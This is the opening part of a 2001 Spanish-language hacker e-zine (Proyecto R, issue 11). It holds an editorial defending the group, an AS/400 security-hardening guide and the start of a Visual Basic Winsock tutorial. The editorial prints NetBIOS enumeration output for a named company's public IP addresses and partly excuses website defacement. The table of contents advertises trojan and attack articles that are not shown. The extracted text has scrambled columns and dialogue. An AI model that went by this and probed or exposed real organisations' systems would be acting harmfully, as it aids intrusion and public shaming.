You are on page 1of 132

<< PROYECTO_R >> EL PRIMER MAGAZINE ELECTRONICO CHILENO ____ __ ____ /\ _`\ /\ \__ /\ _`\ \ \ \L\ \_ __ ___ __ __ __ ___\

\ ,_\ ___ \ \ \L\ \ \ \ ,__/\`'__\/ __`\/\ \/\ \ /'__`\ /'___\ \ \/ / __`\ \ \ , / \ \ \/\ \ \//\ \L\ \ \ \_\ \/\ __//\ \__/\ \ \_/\ \L\ \ \ \ \\ \ \ \_\ \ \_\\ \____/\/`____ \ \____\ \____\\ \__\ \____/ \ \_\ \_\ \/_/ \/_/ \/___/ `/___/> \/____/\/____/ \/__/\/___/ _______\/_/\/ / /\___/ /\______\ \/__/ \/______/ MAIL: proyecto_r@bigfoot.com URL: www.cdlr.org LA COPIA INFELIZ DEL EDEN

<--------: Numero 11 - Julio del 2001 :--------> :-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-: -:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:..--:: DISCLAIMER ::--.. Toda la informacion aqui contenida se publica unicamente con fines educativos, el mal uso de la misma no sera en ningun caso responsabilidad del editor ni de alguno de los miembros del staff, en algunos casos esa misma informacion es solo un modo de diversion, ya que lo que aqui se expone puede ser totalmente falso Aunque poner en practica algunas de las cosas aqui publicada puede ser ilegal, en ningun momento pretendemos inducir a la ilegalidad con lo aqui expuesto. Los acentos y caracteres especiales han sido eliminados para evitar problemas de compatibilidad con algunos sistemas Editor Recomendado Edit del DOS En otros no se ve del todo bien :-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-: -:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:..--:: Staff Oficial ::--.. Taker Mate Swichman ToNiK teespy Death_Bot Evilnet

PlaXiuS AndyK Don Cucumber Mr.Nexus CHacK Billy Bienvenido evilnet !! ..--:: Lamer del Mes ::--..

Gustavin Alhucena, que alucina en colores pensando en peligrosos 'juankers' que le quieren fastidiar el negocio ... (V. editorial)

..--:: Soporte 911 ::--.. * * * * * * * * * * * * * * * * * Soporte: Cliente: Soporte: Cliente: Soporte: Cliente: Soporte: Cliente: Soporte: Cliente: Soporte: Cliente: Soporte: Cliente: Soporte: Cliente: Soporte: Soporte Tecnico, Buenos Dias. Si, bueno, tengo un problema con mi Word. Que tipo de problema? Bueno solamente estaba escribiendo y de pronto todas las palabras se fueron. Se fueron? Desaparecieron. Hmm Entonces, Que hay en la pantalla ahora? Nada. Esta en blanco. No acepta nada cuando escribo. Esta usted todavia en Word, o lo cerro? Como lo puedo saber? Puede ver el C prompt en la pantalla. Que es un sea-pront? Olvidelo. Puede mover el cursor a traves de la pantalla? No hay ningun cursor. Ya le dije no acepta nada cuando escribo. Tiene su monitor un indicador de poder? Donde esta el monitor? Es la cosa con la pantalla que se parece a un televisor. Tiene una pequena lucecita que le indica cuando esta encendido. No se. Bueno entonces mire atras del monitor y encuentre el cable de poder que sale de este. Lo puede ver? Si creo que si. Cuando se asoma detras del monitor nota que hay dos cables conectados a el y no solo uno. No. Bueno hay dos. Necesito que vuelva a mirar atras y encuentre el otro cable. OK aqui esta. Por favor sigalo y digame si esta bien conectado atras de su computadora. No alcanzo. Bueno, puede ver si lo esta? No. Tal vez si pone su rodilla en algo y se inclina. No es porque no tenga el angulo correcto, es porque esta oscuro. Oscuro? Si la luz de la oficina esta apagada y la unica luz que me llega viene de la ventana. Bueno entonces encienda la luz de la oficina. No puedo. No? Por que no? Porque hace un rato se fue la electricidad. Ah, la electricidad... Se fue la electricidad. Aja. Bueno, ya lo tenemos. Todavia tiene las cajas y manuales y los demas empaques en que venia su computadora? Bueno, si los mantengo en el armario. Excelente. Saquelos desconecte su sistema y empaquelo tal como estaba cuando lo compro. Luego llevelo de vuelta al departamento que se lo dio. De verdad? Tan malo es? Si, me temo que si. Bueno, esta bien supongo. Que les digo? Digales que usted es demasiado GUEON para tener una computadora.

* Cliente: * Soporte: * Cliente: * Soporte: * Cliente: * Soporte: * Cliente: * Soporte: * * * * * * * * * * * * Cliente: Soporte: Cliente: Soporte: Cliente: Soporte: Cliente: Soporte: Cliente: Soporte: Cliente: Soporte:

* Cliente: * Soporte: * * * * Cliente: Soporte: Cliente: Soporte:

Plop..!!!

..--:: Saludos ::--.. NetSearch E-Zine SET RaregaZz JJF/Hackers Team InET HVen Networking Center Zine Store http://www.netsearch-ezine.com http://www.set-ezine.org http://raregazz.acapulco.uagro.mx http://www.jjf.org http://www.warpedreality.com/inet http://www.hven.com.ve http://www.networking-center.org http://surf.to/zs

Y muchos mas que se olvidan... Si me dieran un botellin de cerveza por cada botellin de cerveza que me bebi durante la edicion de esta R, estaria doblemente borracho. :-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-: -:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:..--:: Contenidos ::--.. 01. 02. 03. 04. 05. 06. 07. 08. 09. 10. Introduccion .......................................... Editorial -CDLR saliendo del armario- ................. AS/400. Seguridad Nivel 50, 3 parte .................. Programacion basica en Visual Basic ................... El control Winsock.ocx y creacion de troyanos bajo VB . TrojanSOCK: el troyano de VB .......................... WAP: La Internet mas facil? .......................... El Informe Echelon .................................... Ataques a SQL Server .................................. Overclocking .......................................... Editor Editor Taker Netreus SLAYER SLAYER krajeck Zagato PlaXiuS General Failure & Mr.Nexus Mr.Nuk3m Varios CHack Portavoz Sicario Editor CDLR Taker & teespy CDLR General Failure CDLR Editor

11. Descubriendo Linux Red Hat 5.0 (parte III) ............ 12. 3 1/2 (O mini-articulos, :)) .......................... 12.1/3 Buscando, buscando en la red ...................... 12.2/3 Telefonica, Quien si no ? ......................... 12.3/3 IRC Bots - Eggdrops ............................... 13. Noticias CDLR ......................................... 14. Noticias del Mundo del Espectaculo .................... 15. Bugs & Xploits ........................................ 16. Ha llegado Mail ....................................... 17. Chistes, Cuentos y otras burradas ..................... 18. Llaves PGP............................................. 19. EOF ...................................................

:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-: -:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:..--:: 01. Introduccion ::--.. by Mr.Nexus Compa~eros, compa~eras, ilustre profesor ... hmmm, estaba recordando la presentacion de mi proyecto de fin de curso hace un par de dias, y de paso, me disculpo por la enorme tardanza de este numero del zine, xD Pues si, numerosas responsabilidades han hecho que este numero no saliera en la fecha prometida ... hace cuantos meses?, pero bah, al que no le guste que no mire.

Bueno, al tajo, en este numero os vais a encontrar con varios articulos de programacion en redes, info de sistemas NT, overcloking, WAP, SQL, articulos de opinion .. bueno, que vamos cargaditos. Era lo minimo que podiamos hacer despues de haceros esperar tanto tiempo, hacer un zine con muchos articulos :D. A su salud... :-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-: -:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:..--:: 02. Editorial -CDLR saliendo del armario- ::--.. by Mr.Nexus "Los hackers son un poco autistas"... Ya hace bastante tiempo que el ilustre teniente Anselmo del Moral, jefe del grupo de delitos informaticos de la Guardia Civil de Espa~a, deleitara a los medios con esta afirmacion. http://www.el-mundo.es/navegante/98/noviembre/06/entremoral.html En fin, quizas alguien penso que tal atrevimiento no era mas que fruto del desconocimiento de lo que ocurre de verdad, pero no!, parece ser que incluso los profesionales de la seguridad informatica opinan este tipo de cosas ... quizas muchos ya saben que quiero decir ... Hace pocos meses, el gerente de ingenieria de nuestra queriiiiiida Bysecure, Gustavo Alhucena, movido por la misma ignorancia que su antecesor, osaba decir estas palabras: "Se caracterizan por tener un caracter reservado, introvertido y poco sociable" [Nex: Vete y diselo a las camareras de 'mi' bar ] "Convertirse en hacker es mas facil de lo que se piensa. Para ello, solo se necesita un computador con conexion telefonica, dos o tres programas especificos para la intromision de sistemas y conocimientos basicos de comandos en DOS" [Nex: A ver .... C:\>hack "hack" no se reconoce como un comando interno o externo, programa o archivo por lotes ejecutable. Bah!, ya ni siquiera me se el comando secreto ... ] "Siempre se esconde tras el anonimato de un nombre clave o nickname" [CDLR: Preparate... estos somos nosotros... Mi nombre es Javier Lopez, soy de Asturias (Espa~a), estoy realizando estudios superiores de informatica y actualmente trabajo para una empresa de seguridad informatica. Hasta aqui todo bien... pero resulta que en la Red hay quien me conocen como Nexus, perteneciente al grupo CDLR, creadores del que probablemente sea el e-zine hacker mas importante de latinoamerica en la actualidad. Mi nombre es Sacha Yunusic, soy de Santiago, Chile. Estudio Ingeneria Civil

en una universidad Chilena y tambien trabajo en una empresa de seguridad informatica. En la red mi nombre es Don Cucumber, o cucumber solamente, como prefieran. Soy miembro de CDLR hace mas o menos dos a~os y estoy feliz de pertenecer a el. Mi nombre es Felipe Sanchez, soy de Medellin, Colombia, estudio ingenieria de sistemas y trabajo en una importante empresa como Coordinador de Informatica , hace unos cuantos a~os pululo por la red, y hace unos cuantos mas me muevo entre los coputadores con el nombre de Taker, me adheri a CDLR hace un par de a~os y estoy orgulloso de haberlo hecho, y por lo que somos y hacemos, no necesitamos un pasamonta~as virtual, creo que contribuimos al desarrollo de la seguridad y la red en si. Mi nombre es Marco Torres, soy Tecnico Eletronico y en estos momentos estudio Ingenieria en Informatica . Trabajo como Ingeniero de software y Product Manager de seguridad en una empresa multinacional con casa matriz en Espa~a. En la red soy conocido como "PlaXiuS" creador del E-zine proyecto R , que es una de las cosas que mas me enorgullecen en la vida tanto por el trabajo que este ha tomado como por el grupo humano que conforma CDLR. Pues ya he dado la cara en varias oportunidad pero aca lo hago con la frente en alto para que se deje de hablar de los hackers como un grupo de delincuentes que se ocultan en el anonimato bajo un nick. Estoy orgulloso de lo que hago y no tengo nada que esconder asi que aqui estoy. Yo soy Cesar Ramos, soy de la Ciudad de Mexico, Mexico y licenciado en economia de profesion; actualmente trabajo para de la empresa comercial mas grande de mi pais. Participo en CDLR desde su fundacion bajo el seudonimo de CHack y no obstante ser el miembro mas viejo y menos apto del grupo he encontrado en el, la honesta y desinteresada ayuda informatica, a todo aquel que lo necesita. Soy Tomas Saieg, perteneciente a CDLR desde hace algun tiempo. A la fecha (02/2001) estoy cursando 4 medio en un colegio chileno, y trabajando en una empresa de seguridad informatica. Me muevo en la red con el nick "teespy". Yo soy David Soto, de Talcahuano Chile. Perteneciente a CDLR desde su segunda edicion. Soy tecnico electronico y actualmente estudio ingenieria civil electronica. Desde que me paseo por Inet mi nick ha sido AnDyK. Como grupo queremos dejar en claro que no nos avergonzamos de lo que hacemos, ni mucho menos de lo que somos. A cada uno de nosotros nos educaron para ser personas honradas y a aceptar las consecuencias de nuestros errores... hemos cometido alguno por hacer lo que nos gusta sin molestar a nadie? Cada uno de nosotros tenemos distintos gustos dentro de la seguridad informatica. Algunos de nosotros nos dedicamos a desarrollar software que sirva de apoyo a lo que estamos aprendiendo en forma personal o colectiva, como es en el caso de los grupos como CDLR, otros se dedican a buscar fallos de seguridad en programas comerciales usados en los computadores de grandes compa~ias. Algunos de nosotros hemos encontrado y dise~ado ataques contra servidores telnet, ftp, http, pop3, etc... mantenemos un contacto habitual con desarrolladores de software que encontramos errores y colaboramos con ellos para reparar el fallo. Hemos escrito numerosos articulos sobre seguridad informatica, es mas, tenemos en linea el numero 10 de nuestra revista electronica (o ezine), donde tratamos de ense~ar las vulnerabilidades de los sistemas informaticos mas variados, respondemos educadamente todos los mails que recibimos a nuestras casillas personales o a las del grupo preguntando o consultando algo, y procuramos colaborar en listas de correo sobre seguridad. Tanto asi, que

somos fundadores, gracias al especial apoyo de Javier, de una lista de seguridad de un sistema operativo muy importante en Internet, siendo esta lista uno de los principales puntos de encuentro de los administradores de toda hispanoamerica que quieren asegurar sus servidores y muchos de los integrantes del grupo tratamos de apoyarlos y ayudarlos dentro de lo que podemos. No somos sus enemigos, al contrario. Tambien hemos estado muchas veces en contacto con los departamentos de informatica de muchas compa~ias, avisando sobre problemas de seguridad en sus sistemas, y asesorando sobre la mejor manera de susbsanarlos. Disfrutamos cuando avisamos a algun administrador de fallos de seguridad en sus maquinas y cuando recibimos una respuesta cordial de agradecimiento. Estamos en contra del crackeo de paginas (modificacion de las paginas web para hacerse popular), pero algunas veces la disculpamos, por ser esta la unica manera de que algunos se~ores puedan ver lo evidente. Lo que no aceptamos bajo ningun aspecto, es el crackeo de servidores (destruccion de la informacion con mala intencion, por la mera razon de hacer algo malo), eso es inaceptable. Estamos a favor de la "full disclosure" (acceso libre y total de la informacion) y nos encanta ver como cada dia se desarrollan nuevas formas de proteger sistemas... y de vulnerarlos. Nosotros intentamos apoyar en ambos casos. Es con estas cosas que nos ayudamos a nosotros como personas con ganas de aprender sobre este tema, nos ayudamos como grupo y tambien ayudamos a las compa~ias de seguridad. Supongo que si existe una definicion para lo que hacemos, esta muy cerca de lo que la gente considera un hacker o mejor dicho de lo que la gente que entiende del tema entiende por hacker, ya que muchas veces se confunde hacker con cracker, con delincuente. En definitiva, estamos orgullosos de lo que somos. No debemos avergonzarnos de nada de lo que hacemos, porque nada de lo que hacemos esta mal. No somos nadie que se esconda detras del falso anonimato que puede dar la Red, no somos ningunos ni~os jugando con computadores sin saber lo que hacemos, ni tenemos la imagen estereotipada de un hacker que dicen los medios. Somos hackers y no somos criminales ] Ok, .. y por si esto fuera poco, estos chicos de BySecure van y se atreven a escanearnos con sus poderosas herramientas de hackeo xDD [Plax: Bueno la IP que nos ataco es la 200.29.134.141 y es de un computador llamado Ulises que por coincidencia pertenece al mismo grupo de trabajo del servidor que mantiene el web de Bysecure..Miren IP 200.29.134.141 //IP en nuestro LOG Name Type Status --------------------------------------------ULISES <20> UNIQUE Registered ULISES <00> UNIQUE Registered FWALL <00> GROUP Registered ULISES <03> UNIQUE Registered FWALL <1E> GROUP Registered IP 200.29.134.132 // IP de www.bysecure.cl Name Type Status --------------------------------------------VULCANO <00> UNIQUE Registered VULCANO <20> UNIQUE Registered

FWALL <00> GROUP Registered BYSECURE <00> GROUP Registered BYSUPPORT <00> GROUP Registered VULCANO <03> UNIQUE Registered FWALL <1E> GROUP Registered FWALL <1D> UNIQUE Registered ..__MSBROWSE__.<01> GROUP Registered VULCANO <01> UNIQUE Registered Entre lineas .. es malo dejar la interface netbios abierta hacia Internet ... se les podria colar algun cybercriminal .. Ahora uds. saquen sus conclusiones ... nosotros no juzgamos a nadie pero si decimos lo que pensamos..] Bah!, si es que estas empresuchas sin escrupulos es lo que tienen, trabajadores inutiles pero ases del marketing, que salen muy guapos cuando hay que posar para una foto. Solo saben hacer eso. No somos los unicos que opinamos basura en contra de BySecure, apenas unas semanas despues de que ocurriera todo esto, otro grupo crackeo cerca de 100 sites dedicando flames contra BySecure. A su salud. :-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-: -:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:..--:: 03. AS/400. Seguridad Nivel 50, 3 parte ::--.. by Taker Hi, vamos ahora a terminar esta saga de articulos sobre AS/400, ya creo que con tres partes es suficiente no... para mi si... ;) y a ver que escribo para la R siguiente... Sigamos con los parametros: QRETSVRSEC -- Este parametro se creo, con el fin de controlar el almacenamiento de passwords en texto claro en el AS/400. Aunque en el sistema no se encuentran (de forma visible) los password de los perfiles de usuario, pues estan cifrados de forma one-way (que imagino ya ustedes sabran de que se trata). Este parametro se utiliza para controlar passwords que dan acceso a otros sistemas, por ejemplo, los del protocolo SLIP, que debe tener un password descifrable para poder ser utilizado para hacer la conexion a otro u otros sistemas. Adicional a esto, en la Version 4 Release 2 (V4R2) se pueden almacenar passwords descifrables a traves de una lista de validacion. Si no desea que los passwords descifrables esten almacenados en su sistema, cambie el valor de QRETSVRSEC a 0 (Asi viene por defecto). Si el valor de este parametro es cambiado de 1 a 0, todos los passwords descifrables seran eliminados del sistema. Para el cambio de este valor, se deben tener autorizaciones de: *ALLOBJ y *SECADM. QRMTSIGN -- Valor de acceso remoto al sistema. El comando STRPASTHR (Iniciar a traves de) permite al solicitante de un inicio de sesion, entrar a un sistema objetivo dando el perfil de usuario, nombre, contrase~a, programa inicial, menu inicial y libreria, con el fin de saltarse los procedimientos normales de login en el sistema remoto (o sea, entrar directamente al sistema sin necesidad de ver la pantalla de inicio.

Esta caracteristica, permite automatizar los servicios del passthrough. El valor de sistema QRMTSIGN determina como el sistema manejara las solicitudes de passthrough (algo asi como pasarela) que recibe. *FRCSIGNON hace que todas las sesiones de pasarela que reciba se inicien de la forma normal, es decir validando nombre de usuario en la pantalla. Si el nombre del perfil de usuario no es el mismo en el sistema origen y el sistema destino, el intento falla. Con el valor *SAMEPRF, la sesion pasarela solo sera permitida cuando el nombre de usuario es identico en ambos sistemas. Con el valor *REJECT, todas las sesiones pasarela son rechazadas. Con el valor *VERIFY, sucede lo siguiente: en el nivel de seguridad 10, todas las sesiones pasarela pueden ser aceptadas siguiendo los procedimientos normales de signon, y no se requiere de contrase~a. En el nivel 20 de seguridad, las solicitudes de pasarela (las que se saltan los procedimientos normales de sign-on) deben contener un usuario valido y la contrase~a valida para ese usuario. Como otra alternativa, se puede dise~ar un programa que sera ejecutado antes y despues de cada sesion de pasarela. Asi entonces, el programa especificado puede controlar y loggear cada sesion de pasarela. Si en el sistema no se utlizan accesos a otros sistemas, ajuste el valor de QRMTSIGN a *REJECT. Si por el contrario este tipo de comunicacion existe, utilice el valor *VERIFY que es el que requiere que sean introducidos ambos perfiles de usuario y sus contrase~as respectivas. QUSEADPAUT -- Utilizar permisos Adoptados. Este parametro controla cuando un programa va a utilizar permiso adoptado desde un programa que este mas arriba en la pila de llamadas y define que usuario pueden crear programas con el atributo USEADPAUT(*YES). Veamos un ejemplo para su uso, si un empleado, o algun intruso crea un programa con el mismo nombre de un programa de una aplicacion y lo almacena en una libreria con mas prioridad en la lista de librerias que la del programa real, entonces al llamar el programa, se ejecutara antes el programa del intruso y sera posible a traves de el adquirir los permisos adoptados del programa original. Para prevenir que un usuario cree este tipo de programas se puede crear una lista de autorizaciones y pasarla como parametro al valor del sistema. Para estar mas seguros, se puede crear la lista de autorizacion con los atributos de *PUBLIC(*Exclude), y despues dar permisos solo a los usuarios a los que se les permita crear esta clase de programas. La utilizacion de este parametro es recomendada para los sistemas en produccion, pero no se recomienda en los sistemas de desarrollo, ya que puede impactar de algun modo la forma en que los programadores hace su trabajo. ** VALORES DEL SISTEMA RELACIONADOS CON LOS PASSWORDS ** Existen 10 valores del sistema que tienen que ver con el uso del comando CHGPWD. Cuando un usuario utiliza este comando para cambiar su contrase~a, el sistema verifica cada uno de estos valores del sistema para determinar las reglas que aplicara al formato de la nueva contrase~a. Si alguno de esos valores restringe el formato de las contrase~as y la nueva contrase~a del usuario viola esas reglas, el sistema envia un mensaje de error y el usuario debera elegir una nueva contrase~a. Es necesario recordar que las contrase~as deben ser secretas, dificiles de adivinar y que deben ser cambiadas regularmente. Sin embargo, la mayorias de las veces "dificil de adivinar" es sinonimo de "dificil de recordar". Y cuando las contrase~as son dificiles de recordar, los usuarios acostumbran escribirlas en un post-it y pegarlo al lado del monitor, o en la CPU (vaya usted a saber) para no olvidarlas y esto sin duda es un grave problema para la seguridad. Miremos los valores que existen:

QPWDEXPITV -- Intervalo de caducidad de la contrase~a. Este determina el numero maximo de dias que una contrase~a es valida. Cuando pasa el limite de tiempo, la contrase~a caduca, y en el siguiente intento de entrada al sistema este devolvera inmediatamente a la pantalla de CHGPWD, pbligando al usuario a cambiar la contrase~a, de lo contrario no podra ingresar al sistema. Las recomendaciones son las siguientes: Para usuarios tipicos asignar valores entre 60 y 90 dias. Para usurios con permisos especiales o que tengan acceso a funciones especiales o datos importantes (areas como recursos humanos, pagos etc), darles un valor entre 30 y 45 dias, y para otros usuarios asignar valores que usted considere adecuados. Este valor del sistema puede ser omitido si se utiliza el parametro PWDEXPITV de los perfiles de usuario. QPWDRQDDIF -- Se requiere contrase~a diferente. Este parametro previene que los usuarios utilicen una nueva contrase~a que ya haya sido seleccionada alguna vez anterior, en sistemas anteriores al V3R1 (que de por si esta un poco viejo ya...;)), este valor solo permitia que el sistema verificara las 32 contrase~as anteriores. Ahora en los sistemas siguientes hay rangos entre 0 y 8, y nos permite los siguientes valores: 0 1 2 3 4 5 6 7 8 Opcion deshabilitada No se pueden duplicar No se pueden duplicar No se pueden duplicar No se pueden duplicar No se pueden duplicar No se pueden duplicar No se pueden duplicar No se pueden duplicar las las las las las las las las 32 contrase~as anteriores 24 contrase~as anteriores 18 contrase~as anteriores 12 contrase~as anteriores 10 contrase~as anteriores 8 contrase~as anteriores 6 contrase~as anteriores 4 contrase~as anteriores

Esta nueva implementacion de este valor del sistema resulta muy util, por lo menos se puede evitar que un usuario no duplique sus ultimas 4 contrase~as y si se quiere ser un poco mas estricto, evitar que dupliquen las ultimas 10 contrase~as. QPWDMINLEN -- Numero minimo de caracteres en contrase~a. Este valor determina el numero minimo de caracteres que debe contener una contrase~a para ser valida. No mucho que decir para este valor. Sugerencia: Coloque a 8 como minimo este valor, para no tener nombres de usuarios y contrase~as muy cortas y faciles de averiguar. QPWDRQDDGT -- Necesita un digito. Este determina si la contrase~a necesita al menos un digito (0 a 9) para ser valida. Se recomienda el uso de por lo menos 1. Este procedimiento no asegura que se obtengan contrase~as seguras, pero al menos hara que un ataque sea menos facil. QPWDLMTAJC -- Limitar el uso de digitos adyacentes. Este valor restringe el uso de digitos adyacentes, asi se puede prevenir el uso de contrase~as como 11111111, numeros de telefono, numeros de identificacion. QPWDLMTCHR -- Limitar el uso de caracteres especificos. Permite especificar hasta 10 caracteres que no seran permitidos en contrase~as validas. Los caracteres que pueden ser usados normalmente en una contrase~a son A a la Z (no son case sensitive, es los mismo "A" que "a"), numero del 0 al 9 y los caracteres especiales #, $ y @. QPWDLMTREP -- Limitar el uso de caracteres repetidos. Este valos permite evitar el uso de caracteres repetidos en una contrase~a. El valor por defecto 0 permite que un caracter sea repetido en una contrase~a. Con el valor en 1,

se evita que un mismo caracter sea utilizado varias veces en una contrase~a, asi las contrase~as "aaabbb" y "ababab" no serian valida porque se esta repitiendo un caracter. Con el valor a 2, se evita que se repita un caracter consecutivamente, en este caso la contrase~a "aaabbb" no seria valida, pero la contrase~a "ababab" si lo seria porque los caracteres repetidos no lo estan consecutivamente. QPWDPOSDIF -- Posicion diferente. Permite prevenir el uso de un caracter en una nueva contrase~a en la misma posicion que tenia en la contrase~a anterior. Fue dise~ado con el proposito de evitar el uso de contrase~as como CASA1, CASA2, CASA3 etc... QPWDVLDPGM -- Programa de validacion de contrase~as. Permite trabajar la validacion de contrase~as con un programa diferente al nativo del OS/400 (o en conjunto con el), se utiliza con el fin de aplicar reglas impuestas por las politicas de seguridad, pero en general no se recomienda y si por algun caso necesario se debe utilizar, este no deberia grabar las contrase~as de usuario. Es mejor colocar este valor en *NONE. *** Fin *** Hasta aqui llegamos por ahora, queda pendiente el articulo sobre auditorias del sistema, y alguna otra cosilla que se me escapa ahora... Nos vemos en la Proxima... Taker CDLR :-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-: -:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:..--:: 04. Programacion basica en Visual Basic ::--.. by Netreus -He de dejar en claro que este texto es basico y esta hecho para novatos en que quieren aprender a hacer sus propios programas para internetComo veremos aplicaciones para Internet hablare algo acerca del protocolo TCP TCP (Transfer Control Protocol) Agrupa un paquete de protocolos de comunicacion de datos. Es uno de los protocolos mas usados em Internet. Y sus caracteristicas: -Es un estandar de protocolos abiertos, cualquiera puede crear aplicaciones que usen TCP. Como lo haremos en este articulo. -Es independiente del software y el hardware que usemos en la conexion. lo cual permite que un PC Windows pueda intercambiar datos usando TCP tanto con un UNIX o un Linux o MAC , etc. Basicamente para hacer una conexion ya sea: telnet, ftp, http, irc, etc... debemos saber como comunicarnos con el computador remoto. El control Winsock de VB nos proporciona una manera facil de realizar conexiones. Las utilidades que podemos darle estan por ejemplo en hacer un programa para conectarse a la web (navegador), al IRC(Cliente IRC), Cliente FTP,programa para enviar mails, como escaner de puertos,tambien como servidor ;D etc...

Inicialmente es importante saber: -La IP a la cual te conectaras -El puerto que utiliza esa conexion ejemplo IP irc.terra.cl 200.28.216.211 maya.latinchat.com 128.242.212.181 www.yahoo.com 64.58.76.176 Puerto 6667 5725 80

Estaria demas dar una lista de puertos ya que existen varias por la red pero dare algunos ejemplos ftp 21 telnet 23 smtp 25 finger 79 http 80 pop3 101 irc 6667 ... Abriremos el VB con un proyecto nuevo, exe estandar al formulario nuevo agregaremos: - 5 CommandButton - 4 controles TextBox - 1 etiqueta Label Crear un control Winsock en el formulario (si no lo encuentras en el cuadro de herramientas, debes agregarlo. Esto se hace con Ctrl + T o en la barra de herramientas -> Proyecto -> Componentes... Y lo buscas en la lista con el nombre de "Microsoft Winsock Control" al aceptar te aparece en el cuadro de herramientas un icono con dos peque~os computadores ). El formulario quedaria de esta manera: +----------------------------------------------------------+ |+----------------++--------++--------++-----------++-----+| || 127.0.0.1 ||Conectar||Escuchar||Desconectar||Salir|| |+----------------++--------++--------++-----------++-----+| |+-------------+ +---------------------------------+ | ||Puerto Local | | Label1.label | | |+-------------+ | | | |+-------------+ | | | ||Puerto Remoto| +---------------------------------+ | |+-------------+ | | +------------------------------------------+| | | Text1.Text || |+-----------+ | || || Enviar | | || |+-----------+ | || | | || | +------------------------------------------+| |+--------------------------------------------------------+| || || || || || || || Text2.Text ||

|| || || || || || |+--------------------------------------------------------+| +----------------------------------------------------------+ Revisar el codigo que acompana este articulo pro.vbp (VBejemplos.zip) En Text1.Text pondremos ordenes. La informacion que recibamos se vera en text2.Text. Que haremos con esto?: Lo ejecutamos, le pondremos el puerto Local = 80, presionamos "Escuchar" ahora ya tenemos abierto el puerto 80 en nuestro pc, podremos recibir datos de cualquier navegador web, veamos esto abriendo el explorer, escribimos http://127.0.0.1 127.0.0.1 se utiliza para conectarse a si mismo, (no es necesario estar conectado a internet) Si todo esta bien el explorer indicara que se esta conectando a http://127.0.0.1. Y nuestro programa recibira los campos de cabecera de la peticion, que son unas lineas parecidas a estas: -------------------------------------------------------------GET / HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */* Accept-Language: es Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 5.5; Windows 98) Host: 127.0.0.1 Connection: Keep-Alive (linea en blanco al final muy importante) --------------------------------------------------------------- La primera linea el comando GET indica al servidor que envie la pagina solicitada. - La segunda dice que formatos de imagen acepta nuestro navegador - La tercera dice el lenguaje que tenemos definido es = espa~ol - La cuarta el tipo de codificacion - La quinta datos que identifican nuestro navegador - La sexta, Host dice donde estamos conectados actualmente - La ultima dice el tipo de conexion Esto es lo que generalmente se envia en una conexion http, ahora usando la curiosidad: que pasaria si enviamos estas mismas lineas hacia una web ? por ejemplo http://www.yahoo.com la funcion en VB para enviar esto seria: Sub FuncionEnviar() Dim Com As String Com = "GET / HTTP/1.1" + vbCrLf Com = Com + "Accept: image/gif, image/x-xbitmap, image/jpeg, _ image/pjpeg, */*" + vbCrLf Com = Com + "Accept-Language: es" + vbCrLf

Com = Com + "Accept-Encoding: gzip, deflate" + vbCrLf Com = Com + "User-Agent: Mozilla/4.0 (compatible; MSIE 5.5; _ Windows 98)" + vbCrLf Com = Com + "Host: 127.0.0.1" + vbCrLf Com = Com + "Connection: Keep-Alive" + vbCrLf Com = Com + vbCrLf Winsock.SendData Com End Sub La respuesta del Servidor seria esta: 200 OK (Dice que la peticion se ha completado con exito). Lo que ocurrira es que recibiremos todo el codigo fuente de la pagina de www.yahoo.com en la ventana Text2. la diferiencia entre nuestro programa y un navegador es que el navegador interpreta ese codigo y nuetro programa no, y el trabajo nuestro es interpretar ese codigo para hacer lo que deseamos. A manera de ejemplo, para saber si un usuario de icq esta en linea. con nuestro Pro.exe con la ip 127.0.0.1 y el puerto local: 80 le damos "Escuchar" Paso siguiente, usando el explorer nos conectamos a http://www.icq.com/ En el recuadro de buscar usuario ingresamos el email de un amigo por ejemplo: BillGates@Mierdasoft.com Antes de presionar el boton buscar, cambiamos la direccion de http://www.icq.com/ por http://127.0.0.1 y le damos buscar y en nuestro programa recibiremos algo asi como esto: ---------------------------------------------------------------POST /scripts/SearchWWP.dll HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */* Accept-Language: es Content-Type: application/x-www-form-urlencoded Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 5.5; Windows 98) Host: 127.0.0.1 Content-Length: 63 Connection: Keep-Alive Cache-Control: no-cache first=&last=&email=BillGates@Mierdasoft.com&handle=&Search=+Go+ (una linea en blanco al final muy importante) ----------------------------------------------------------------(esto que hicimos es para saber que se envia con el 